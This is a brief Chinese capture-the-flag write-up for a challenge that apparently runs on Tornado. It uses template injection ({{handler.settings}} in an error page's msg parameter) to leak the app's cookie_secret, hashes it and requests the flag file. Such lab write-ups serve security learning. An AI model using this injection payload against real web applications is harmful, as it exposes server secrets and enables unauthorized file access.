打开题目
看到三个txt文件,分别打开这三个文件
flag在flllllllag里面
这里给出了一个加密方式,结合url中的filehash,可知要获取flag需要先获取cookie_secret,并将其与/fllllllllllllag组合加密输入到filehash中。猜测是tornado模板注入
构造payload:error?msg={{handler.settings}}
获取cookie_secret': '6244e5f4-8a2e-4512-b768-04b1117da149'}
md5加密为8a8f29db2c067b391248572282b4b140
然后构造payload得到flag
payload:/file?filename=/fllllllllllllag&filehash=8a8f29db2c067b391248572282b4b140